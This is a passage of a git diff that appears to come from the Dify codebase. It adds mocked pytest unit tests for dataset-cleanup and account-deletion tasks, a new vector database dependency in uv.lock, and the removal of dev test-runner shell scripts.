+        - Provided doc_form is passed to IndexProcessorFactory
+        """
+        # Arrange
+        valid_doc_form = "qa_index"
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form=valid_doc_form,
+        )
+
+        # Assert
+        mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form)
+
+
+# ============================================================================
+# Test Error Handling
+# ============================================================================
+
+
+class TestErrorHandling:
+    """Test cases for error handling and recovery."""
+
+    def test_clean_dataset_task_vector_cleanup_failure_continues(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+        mock_document,
+        mock_segment,
+    ):
+        """
+        Test that document cleanup continues even if vector cleanup fails.
+
+        Scenario:
+        - IndexProcessor.clean() raises an exception
+        - Document and segment deletion should still proceed
+
+        Expected behavior:
+        - Exception is caught and logged
+        - Documents and segments are still deleted
+        - Session is committed
+        """
+        # Arrange
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents
+            [mock_segment],  # segments
+        ]
+        mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error")
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert - documents and segments should still be deleted
+        mock_db_session.session.delete.assert_any_call(mock_document)
+        mock_db_session.session.delete.assert_any_call(mock_segment)
+        mock_db_session.session.commit.assert_called_once()
+
+    def test_clean_dataset_task_storage_delete_failure_continues(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that cleanup continues even if storage deletion fails.
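+
+        The error-isolation pattern assumed around storage calls is roughly
+        (a sketch; the task is expected to log and continue):
+
+            try:
+                storage.delete(upload_file.key)
+            except Exception:
+                logger.exception("Failed to delete file from storage")
+            db.session.delete(upload_file)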
+
+        Scenario:
+        - Segment contains image file references
+        - Storage.delete() raises an exception
+        - Cleanup should continue
+
+        Expected behavior:
+        - Exception is caught and logged
+        - Image file record is still deleted from database
+        - Other cleanup operations proceed
+        """
+        # Arrange
+        # Need at least one document for segment processing to occur (code is in else block)
+        mock_document = MagicMock()
+        mock_document.id = str(uuid.uuid4())
+        mock_document.tenant_id = tenant_id
+        mock_document.data_source_type = "website"  # Non-upload type to avoid file deletion
+
+        mock_segment = MagicMock()
+        mock_segment.id = str(uuid.uuid4())
+        mock_segment.content = "Test content with image"
+
+        mock_upload_file = MagicMock()
+        mock_upload_file.id = str(uuid.uuid4())
+        mock_upload_file.key = "images/test-image.jpg"
+
+        image_file_id = mock_upload_file.id
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents - need at least one for segment processing
+            [mock_segment],  # segments
+        ]
+        mock_get_image_upload_file_ids.return_value = [image_file_id]
+        mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file
+        mock_storage.delete.side_effect = Exception("Storage service unavailable")
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert - storage delete was attempted for the image file
+        mock_storage.delete.assert_called_with(mock_upload_file.key)
+        # Image file should still be deleted from the database
+        mock_db_session.session.delete.assert_any_call(mock_upload_file)
+
+    def test_clean_dataset_task_database_error_rollback(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that the database session is rolled back on error.
+
+        Scenario:
+        - Database operation raises an exception
+        - Session should be rolled back to prevent dirty state
+
+        Expected behavior:
+        - Session.rollback() is called
+        - Session.close() is called in finally block
+        """
+        # Arrange
+        mock_db_session.session.commit.side_effect = Exception("Database commit failed")
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_db_session.session.rollback.assert_called_once()
+        mock_db_session.session.close.assert_called_once()
+
+    def test_clean_dataset_task_rollback_failure_still_closes_session(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that the session is closed even if rollback fails.
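+
+        The session-lifecycle shape assumed by this test and the one above is
+        a nested guard, roughly (a sketch of the expected task structure):
+
+            try:
+                ...  # cleanup work
+                db.session.commit()
+            except Exception:
+                try:
+                    db.session.rollback()
+                except Exception:
+                    logger.exception("Rollback failed")
+            finally:
+                db.session.close()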
+
+        Scenario:
+        - Database commit fails
+        - Rollback also fails
+        - Session should still be closed
+
+        Expected behavior:
+        - Session.close() is called regardless of rollback failure
+        """
+        # Arrange
+        mock_db_session.session.commit.side_effect = Exception("Commit failed")
+        mock_db_session.session.rollback.side_effect = Exception("Rollback failed")
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_db_session.session.close.assert_called_once()
+
+
+# ============================================================================
+# Test Pipeline and Workflow Deletion
+# ============================================================================
+
+
+class TestPipelineAndWorkflowDeletion:
+    """Test cases for pipeline and workflow deletion."""
+
+    def test_clean_dataset_task_with_pipeline_id(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        pipeline_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that the pipeline and workflow are deleted when pipeline_id is provided.
+
+        Expected behavior:
+        - Pipeline record is deleted
+        - Related workflow record is deleted
+        """
+        # Arrange
+        mock_query = mock_db_session.session.query.return_value
+        mock_query.where.return_value = mock_query
+        mock_query.delete.return_value = 1
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+            pipeline_id=pipeline_id,
+        )
+
+        # Assert - verify delete was called for the pipeline-related queries.
+        # The actual count depends on the total queries, but pipeline deletion
+        # should add two more.
+        assert mock_query.delete.call_count >= 7  # 5 base + 2 pipeline/workflow
+
+    def test_clean_dataset_task_without_pipeline_id(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that pipeline/workflow deletion is skipped when pipeline_id is None.
+
+        Expected behavior:
+        - Pipeline and workflow deletion queries are not executed
+        """
+        # Arrange
+        mock_query = mock_db_session.session.query.return_value
+        mock_query.where.return_value = mock_query
+        mock_query.delete.return_value = 1
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+            pipeline_id=None,
+        )
+
+        # Assert - verify delete was called only for the base queries (5 times)
+        assert mock_query.delete.call_count == 5
+
+
+# ============================================================================
+# Test Segment Attachment Cleanup
+# ============================================================================
+
+
+class TestSegmentAttachmentCleanup:
+    """Test cases for segment attachment cleanup."""
+
+    def test_clean_dataset_task_with_attachments(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that segment attachments are cleaned up properly.
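+
+        The attachment lookup assumed here is the binding-to-file JOIN that
+        the mock execute stub feeds, roughly (a sketch; model names are
+        illustrative, not the task's actual identifiers):
+
+            rows = db.session.execute(
+                select(AttachmentBinding, UploadFile).join(
+                    UploadFile, UploadFile.id == AttachmentBinding.attachment_id
+                )
+            ).all()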
+
+        Scenario:
+        - Dataset has segment attachments with associated files
+        - Both binding and file records should be deleted
+
+        Expected behavior:
+        - Storage.delete() is called for each attachment file
+        - Attachment file records are deleted from database
+        - Binding records are deleted from database
+        """
+        # Arrange
+        mock_binding = MagicMock()
+        mock_binding.attachment_id = str(uuid.uuid4())
+
+        mock_attachment_file = MagicMock()
+        mock_attachment_file.id = mock_binding.attachment_id
+        mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf"
+
+        # Setup execute to return the attachment with its binding
+        mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)]
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_storage.delete.assert_called_with(mock_attachment_file.key)
+        mock_db_session.session.delete.assert_any_call(mock_attachment_file)
+        mock_db_session.session.delete.assert_any_call(mock_binding)
+
+    def test_clean_dataset_task_attachment_storage_failure(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that cleanup continues even if attachment storage deletion fails.
+
+        Expected behavior:
+        - Exception is caught and logged
+        - Attachment file and binding are still deleted from database
+        """
+        # Arrange
+        mock_binding = MagicMock()
+        mock_binding.attachment_id = str(uuid.uuid4())
+
+        mock_attachment_file = MagicMock()
+        mock_attachment_file.id = mock_binding.attachment_id
+        mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf"
+
+        mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)]
+        mock_storage.delete.side_effect = Exception("Storage error")
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert - storage delete was attempted
+        mock_storage.delete.assert_called_once()
+        # Records should still be deleted from the database
+        mock_db_session.session.delete.assert_any_call(mock_attachment_file)
+        mock_db_session.session.delete.assert_any_call(mock_binding)
+
+
+# ============================================================================
+# Test Upload File Cleanup
+# ============================================================================
+
+
+class TestUploadFileCleanup:
+    """Test cases for upload file cleanup."""
+
+    def test_clean_dataset_task_deletes_document_upload_files(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that document upload files are deleted.
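+
+        The lookup assumed for this path reads the upload file ID out of the
+        document's data-source info, roughly (a sketch):
+
+            file_id = document.data_source_info_dict["upload_file_id"]
+            upload_file = db.session.query(UploadFile).where(UploadFile.id == file_id).first()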
+
+        Scenario:
+        - Document has data_source_type = "upload_file"
+        - data_source_info contains upload_file_id
+
+        Expected behavior:
+        - Upload file is deleted from storage
+        - Upload file record is deleted from database
+        """
+        # Arrange
+        mock_document = MagicMock()
+        mock_document.id = str(uuid.uuid4())
+        mock_document.tenant_id = tenant_id
+        mock_document.data_source_type = "upload_file"
+        mock_document.data_source_info = '{"upload_file_id": "test-file-id"}'
+        mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"}
+
+        mock_upload_file = MagicMock()
+        mock_upload_file.id = "test-file-id"
+        mock_upload_file.key = "uploads/test-file.txt"
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents
+            [],  # segments
+        ]
+        mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file
+
+        # Act
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_storage.delete.assert_called_with(mock_upload_file.key)
+        mock_db_session.session.delete.assert_any_call(mock_upload_file)
+
+    def test_clean_dataset_task_handles_missing_upload_file(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that missing upload files are handled gracefully.
+
+        Scenario:
+        - Document references an upload_file_id that doesn't exist
+
+        Expected behavior:
+        - No error is raised
+        - Cleanup continues normally
+        """
+        # Arrange
+        mock_document = MagicMock()
+        mock_document.id = str(uuid.uuid4())
+        mock_document.tenant_id = tenant_id
+        mock_document.data_source_type = "upload_file"
+        mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}'
+        mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"}
+
+        mock_db_session.session.scalars.return_value.all.side_effect = [
+            [mock_document],  # documents
+            [],  # segments
+        ]
+        mock_db_session.session.query.return_value.where.return_value.first.return_value = None
+
+        # Act - should not raise an exception
+        clean_dataset_task(
+            dataset_id=dataset_id,
+            tenant_id=tenant_id,
+            indexing_technique="high_quality",
+            index_struct='{"type": "paragraph"}',
+            collection_binding_id=collection_binding_id,
+            doc_form="paragraph_index",
+        )
+
+        # Assert
+        mock_storage.delete.assert_not_called()
+        mock_db_session.session.commit.assert_called_once()
+
+    def test_clean_dataset_task_handles_non_upload_file_data_source(
+        self,
+        dataset_id,
+        tenant_id,
+        collection_binding_id,
+        mock_db_session,
+        mock_storage,
+        mock_index_processor_factory,
+        mock_get_image_upload_file_ids,
+    ):
+        """
+        Test that non-upload_file data sources are skipped.
+ + Scenario: + - Document has data_source_type = "website" + + Expected behavior: + - No file deletion is attempted + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete should not be called for document files + # (only for image files in segments, which are empty here) + mock_storage.delete.assert_not_called() + + +# ============================================================================ +# Test Image File Cleanup +# ============================================================================ + + +class TestImageFileCleanup: + """Test cases for image file cleanup in segments.""" + + def test_clean_dataset_task_deletes_image_files_in_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that image files referenced in segment content are deleted. + + Scenario: + - Segment content contains image file references + - get_image_upload_file_ids returns file IDs + + Expected behavior: + - Each image file is deleted from storage + - Each image file record is deleted from database + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = ' ' + + image_file_ids = ["image-1", "image-2"] + mock_get_image_upload_file_ids.return_value = image_file_ids + + mock_image_files = [] + for file_id in image_file_ids: + mock_file = MagicMock() + mock_file.id = file_id + mock_file.key = f"images/{file_id}.jpg" + mock_image_files.append(mock_file) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Setup a mock query chain that returns files in sequence + mock_query = MagicMock() + mock_where = MagicMock() + mock_query.where.return_value = mock_where + mock_where.first.side_effect = mock_image_files + mock_db_session.session.query.return_value = mock_query + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + assert mock_storage.delete.call_count == 2 + mock_storage.delete.assert_any_call("images/image-1.jpg") + mock_storage.delete.assert_any_call("images/image-2.jpg") + + def test_clean_dataset_task_handles_missing_image_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing image files are handled gracefully. 
+ + Scenario: + - Segment references image file ID that doesn't exist in database + + Expected behavior: + - No error is raised + - Cleanup continues + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = '' + + mock_get_image_upload_file_ids.return_value = ["nonexistent-image"] + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Image file not found + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + +# ============================================================================ +# Test Edge Cases +# ============================================================================ + + +class TestEdgeCases: + """Test edge cases and boundary conditions.""" + + def test_clean_dataset_task_multiple_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of multiple documents and segments. + + Scenario: + - Dataset has 5 documents and 10 segments + + Expected behavior: + - All documents and segments are deleted + """ + # Arrange + mock_documents = [] + for i in range(5): + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = tenant_id + doc.data_source_type = "website" # Non-upload type + mock_documents.append(doc) + + mock_segments = [] + for i in range(10): + seg = MagicMock() + seg.id = str(uuid.uuid4()) + seg.content = f"Segment content {i}" + mock_segments.append(seg) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + mock_documents, + mock_segments, + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - all documents and segments should be deleted + delete_calls = mock_db_session.session.delete.call_args_list + deleted_items = [call[0][0] for call in delete_calls] + + for doc in mock_documents: + assert doc in deleted_items + for seg in mock_segments: + assert seg in deleted_items + + def test_clean_dataset_task_document_with_empty_data_source_info( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test handling of document with empty data_source_info. 
+ + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. + + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). 
+ + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second argument + assert call_args[0][1] is None + + # Verify keyword arguments + assert call_args[1]["with_keywords"] is True + assert call_args[1]["delete_child_chunks"] is True diff --git a/api/tests/unit_tests/tasks/test_delete_account_task.py b/api/tests/unit_tests/tasks/test_delete_account_task.py new file mode 100644 index 0000000000..3b148e63f2 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_delete_account_task.py @@ -0,0 +1,112 @@ +""" +Unit tests for delete_account_task. + +Covers: +- Billing enabled with existing account: calls billing and sends success email +- Billing disabled with existing account: skips billing, sends success email +- Account not found: still calls billing when enabled, does not send email +- Billing deletion raises: logs and re-raises, no email +""" + +from types import SimpleNamespace +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.delete_account_task import delete_account_task + + +@pytest.fixture +def mock_db_session(): + """Mock the db.session used in delete_account_task.""" + with patch("tasks.delete_account_task.db.session") as mock_session: + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + yield mock_session + + +@pytest.fixture +def mock_deps(): + """Patch external dependencies: BillingService and send_deletion_success_task.""" + with ( + patch("tasks.delete_account_task.BillingService") as mock_billing, + patch("tasks.delete_account_task.send_deletion_success_task") as mock_mail_task, + ): + # ensure .delay exists on the mail task + mock_mail_task.delay = MagicMock() + yield { + "billing": mock_billing, + "mail_task": mock_mail_task, + } + + +def _set_account_found(mock_db_session, email: str = "user@example.com"): + account = SimpleNamespace(email=email) + mock_db_session.query.return_value.where.return_value.first.return_value = account + return account + + +def _set_account_missing(mock_db_session): + mock_db_session.query.return_value.where.return_value.first.return_value = None + + +class TestDeleteAccountTask: + def test_billing_enabled_account_exists_calls_billing_and_sends_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-123" + account = _set_account_found(mock_db_session, email="a@b.com") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + 
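+ # The success email is queued asynchronously via .delay with the deleted account's email address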
mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_billing_disabled_account_exists_sends_email_only(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-456" + account = _set_account_found(mock_db_session, email="x@y.com") + + # Disable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", False): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_not_called() + mock_deps["mail_task"].delay.assert_called_once_with(account.email) + + def test_account_not_found_billing_enabled_calls_billing_no_email(self, mock_db_session, mock_deps, caplog): + # Arrange + account_id = "missing-id" + _set_account_missing(mock_db_session) + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act + delete_account_task(account_id) + + # Assert + mock_deps["billing"].delete_account.assert_called_once_with(account_id) + mock_deps["mail_task"].delay.assert_not_called() + # Optional: verify log contains not found message + assert any("not found" in rec.getMessage().lower() for rec in caplog.records) + + def test_billing_delete_raises_propagates_and_no_email(self, mock_db_session, mock_deps): + # Arrange + account_id = "acc-err" + _set_account_found(mock_db_session, email="err@ex.com") + mock_deps["billing"].delete_account.side_effect = RuntimeError("billing down") + + # Enable billing + with patch("tasks.delete_account_task.dify_config.BILLING_ENABLED", True): + # Act & Assert + with pytest.raises(RuntimeError): + delete_account_task(account_id) + + # Ensure email was not sent + mock_deps["mail_task"].delay.assert_not_called() diff --git a/api/uv.lock b/api/uv.lock index 8cd49d057f..e6a6cf8ffc 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -1515,6 +1515,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1711,6 +1712,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2918,6 +2920,18 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484 }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, upload-time = "2025-10-09T20:47:28.998Z" }, + { url = "https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath 